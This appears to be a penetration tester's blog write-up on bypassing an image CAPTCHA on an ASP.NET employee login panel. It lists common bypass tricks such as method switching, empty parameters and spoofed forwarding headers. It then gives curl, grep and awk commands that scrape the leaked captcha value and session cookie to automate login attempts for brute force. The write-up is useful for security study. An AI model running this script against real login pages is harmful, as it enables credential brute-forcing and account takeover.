BOOK THIS SPACE FOR AD
ARTICLE ADCAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) is a type of security measure known as challenge-response authentication. CAPTCHA helps protect you from spam and password decryption by asking you to complete a simple test that proves you are human and not a computer trying to break into a password protected account.
A CAPTCHA test is made up of two simple parts: a randomly generated sequence of letters and/or numbers that appear as a distorted image, and a text box. To pass a the test and prove your human identity, simply type the characters you see in the image into the text box.
Captcha is used for security primarily to distinguish between human users and automated bots
1. Bot Prevention: CAPTCHA helps prevent automated bots from carrying out tasks that are meant for human users, such as creating accounts, submitting forms, or conducting transactions.
2. Spam Protection: CAPTCHA is commonly used to prevent spam bots from flooding websites with unwanted content, such as spam comments, messages, or emails.
I was doing Penetration Testing on an Employee Panel , I noticed Captcha inform of Image which I require to Input along with Username and Password.
So I started testing to find a way to Bypass This Captcha.
I tried Bypassing it using Common Methods ,such as :
changing the request method, for example POST to GETPOST / HTTP 1.1Host: target.com
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
Change the method to GET
GET /?_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 HTTP 1.1Host: target.com
2. Try remove the value of the captcha parameter
POST / HTTP 1.1Host: target.com
_RequestVerificationToken=&_Username=daffa&_Password=test123
3. Try reuse old captcha token
4. Try custom header to bypass captcha
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
But sadly Nothing worked
Then, I noticed something , the image key (value) is in the source code
So , I got an idea :)
Lets send a request to this Page Which is https://panel.site.com/MyAccount/Login.aspx2. I will grep the Key which is always after this endpoint ghcaptcha.ashx , then I will use it in the request so I can Bypass the captcha.
Note: When I tried to use the same key with other requests it was not working , so I figure that I have to use only one unique key with every request :(
So what I mean here , Lets say we send Curl command and we got the Captcha Value from the source code
Captcha_Value=11111111Cookie:ASP.NET_SessionId=000000000
Now when I request another curl with the same Captcha_Value=11111111 , it will not worked , it returned
You entered wrong code.Since we know all of these information , its time for script writing .
I will send curl request to the Login Panel Endpoint , I will grep the Key Value with also ASP.NET_SessionId (since we said we can’t use different session with another Captcha_Value)To grep the Captcha
This command first uses grep to select lines containing the string "ghcaptcha.ashx" in a case-insensitive manner (-i). Then, the second grep command with -o option selects and outputs only the numbers ([0-9]) found in those lines.
curl -s https://panel.site.com/MyAccount/Login.aspx | grep -i "ghcaptcha.ashx" | grep -o '[0-9]\+'2. Now we know how things work , we need to grep not only Captcha_Value , but also ASP.NET_SessionId so they work together
Description :
curl -s -D - https://panel.site.com/MyAccount/Login.aspx This command fetches the page and prints the headers to the console.awk '/Set-Cookie: ASP.NET_SessionId=/ {print $3}' > session_id.txt This command extracts the ASP.NET_SessionId from the headers and saves it to a file named session_id.txtawk '/ghcaptcha\.ashx/ {match($0, /[0-9]+/); print substr($0, RSTART, RLENGTH)}' session_id.txt: This command extracts the number value from the ghcaptcha parameter from the file session_id.txt.curl -s -D - https://panel.site.com/MyAccount/Login.aspx > response.txtghcaptcha=$(cat response.txt | grep -i "ghcaptcha.ashx" | grep -o '[0-9]\+')
session_id=$(cat response.txt | grep -i "ASP.NET_SessionId" | grep -oE "ASP.NET_SessionId=[^;]+" | cut -d '=' -f 2)
curl -i -s -k -X $'POST' \
-H $'Host: panel.site.com' -H $'Content-Length: 1367' -H $'Sec-Ch-Ua: \"Chromium\";v=\"121\", \"Not A(Brand\";v=\"99\"' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Cache-Control: no-cache' -H $'X-Requested-With: XMLHttpRequest' -H $'X-Microsoftajax: Delta=true' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'Accept: */*' -H $'Origin: https://panel.site.com' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Referer: https://site.panel.com/MyAccount/Login.aspx' -H $'Accept-Encoding: gzip, deflate, br' -H $'Accept-Language: en-US,en;q=0.9' -H $'Priority: u=1, i' \
-b $'ASP.NET_SessionId='$session_id \
--data-binary $'ctl00%24ToolkitScriptManager1=ctl00%24MainContent%24ucLogin%24upLogin%7Cctl00%24MainContent%24ucLogin%24LoginUser%24LoginButton&ToolkitScriptManager1_HiddenField=&__EVENTTARGET=&__EVENTARGUMENT=&ctl00%24MainContent%24ucLogin%24hdnLoginAttemptCounter=0&ctl00%24MainContent%24ucLogin%24LoginUser%24UserName=alex&ctl00%24MainContent%24ucLogin%24LoginUser%24Password=asasd&ctl00%24MainContent%24ucLogin%24LoginUser%24txtCode='$ghcaptcha'&__ASYNCPOST=true&ctl00%24MainContent%24ucLogin%24LoginUser%24LoginButton=Login' \
$'https://panel.site.com/MyAccount/Login.aspx'
This is a screen shot from the Penetration Testing Report , where I made a list of username and Passwords , Using Curl Command and Bypass Captcha + Perform Brute Force Attack.